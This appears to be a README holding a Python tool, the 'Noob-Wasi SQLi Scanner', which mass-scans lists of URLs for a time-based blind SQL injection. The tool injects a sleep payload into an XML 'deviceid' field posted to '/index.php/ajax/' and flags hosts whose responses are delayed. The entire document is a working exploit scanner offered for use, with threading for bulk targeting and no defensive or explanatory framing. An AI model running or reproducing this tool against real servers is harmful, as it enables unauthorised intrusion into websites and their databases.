README.md
Rendering markdown...
import requests
import time
import argparse
from urllib.parse import urlparse
from colorama import init, Fore, Style
import concurrent.futures
import sys
# Initialize colorama
init()
headers = {
"Content-Type": "application/xml",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
}
payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep({})),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>"""
BANNER = f"""
{Fore.CYAN}╔════════════════════════════╗{Style.RESET_ALL}
{Fore.CYAN}║ {Fore.YELLOW}Noob-Wasi SQLi Scanner {Fore.CYAN}║{Style.RESET_ALL}
{Fore.CYAN}║ {Fore.GREEN}Coded by: Noob-Wasi {Fore.CYAN}║{Style.RESET_ALL}
{Fore.CYAN}║ {Fore.MAGENTA}Version: 1.0 {Fore.CYAN}║{Style.RESET_ALL}
{Fore.CYAN}╚════════════════════════════╝{Style.RESET_ALL}
"""
def is_valid_url(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc])
except:
return False
def test_sql_injection(url, sleep_time=7):
try:
if not url.endswith('/index.php/ajax/'):
url = url.rstrip('/') + '/index.php/ajax/'
start_time = time.time()
requests.post(url, headers=headers, data=payload_template.format(0), timeout=10)
baseline_time = time.time() - start_time
start_time = time.time()
requests.post(url, headers=headers, data=payload_template.format(sleep_time), timeout=sleep_time + 5)
test_time = time.time() - start_time
time_difference = test_time - baseline_time
if time_difference > (sleep_time * 0.8):
return url, time_difference
return None, 0
except requests.exceptions.Timeout:
return url, sleep_time
except requests.exceptions.RequestException:
return None, 0
def scan_urls(urls, max_threads=10):
vulnerable_urls = []
total_urls = len(urls)
completed = 0
def update_progress():
nonlocal completed
completed += 1
sys.stdout.write(f"\r{Fore.CYAN}Scanning: {completed}/{total_urls} ({(completed/total_urls)*100:.1f}%) {Style.RESET_ALL}")
sys.stdout.flush()
with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
future_to_url = {executor.submit(test_sql_injection, url): url for url in urls if is_valid_url(url)}
for future in concurrent.futures.as_completed(future_to_url):
url, delay = future.result()
if url:
vulnerable_urls.append((url, delay))
# Print vulnerable URL immediately
print(f"\n{Fore.GREEN}[VULN] {url} - Delay: {delay:.2f}s{Style.RESET_ALL}")
update_progress()
print() # New line after progress
return vulnerable_urls
def scan_urls_from_file(filename, max_threads=10):
try:
with open(filename, 'r') as file:
urls = [line.strip() for line in file if line.strip()]
return scan_urls(urls, max_threads)
except FileNotFoundError:
print(f"{Fore.RED}[-] Error: File {filename} not found{Style.RESET_ALL}")
return []
except Exception as e:
print(f"{Fore.RED}[-] Error reading file: {str(e)}{Style.RESET_ALL}")
return []
def scan_single_url(url):
url_result, delay = test_sql_injection(url)
if url_result:
print(f"{Fore.GREEN}[VULN] {url_result} - Delay: {delay:.2f}s{Style.RESET_ALL}")
return [(url_result, delay)] if url_result else []
def save_results(vulnerable_urls, output_file):
try:
with open(output_file, 'w') as f:
for url, delay in vulnerable_urls:
f.write(f"{url} - Delay: {delay:.2f}s\n")
print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[-] Error saving results: {str(e)}{Style.RESET_ALL}")
def main():
parser = argparse.ArgumentParser(description="Noob-Wasi SQL Injection Scanner")
parser.add_argument('-u', '--url', help="Single URL to scan")
parser.add_argument('-f', '--file', help="File containing list of URLs")
parser.add_argument('-o', '--output', help="Output file to save vulnerable URLs")
parser.add_argument('-t', '--threads', type=int, default=10, help="Number of concurrent threads (default: 10)")
args = parser.parse_args()
print(BANNER)
if not (args.url or args.file):
parser.print_help()
return
print(f"{Fore.CYAN}Starting SQL injection scan...{Style.RESET_ALL}")
vulnerable_urls = []
if args.url:
if is_valid_url(args.url):
vulnerable_urls = scan_single_url(args.url)
else:
print(f"{Fore.RED}[-] Invalid URL: {args.url}{Style.RESET_ALL}")
elif args.file:
vulnerable_urls = scan_urls_from_file(args.file, args.threads)
print(f"{Fore.CYAN}\nScan completed!{Style.RESET_ALL}")
if vulnerable_urls:
if args.output:
save_results(vulnerable_urls, args.output)
else:
print(f"{Fore.RED}\nNo vulnerabilities detected.{Style.RESET_ALL}")
if __name__ == "__main__":
main()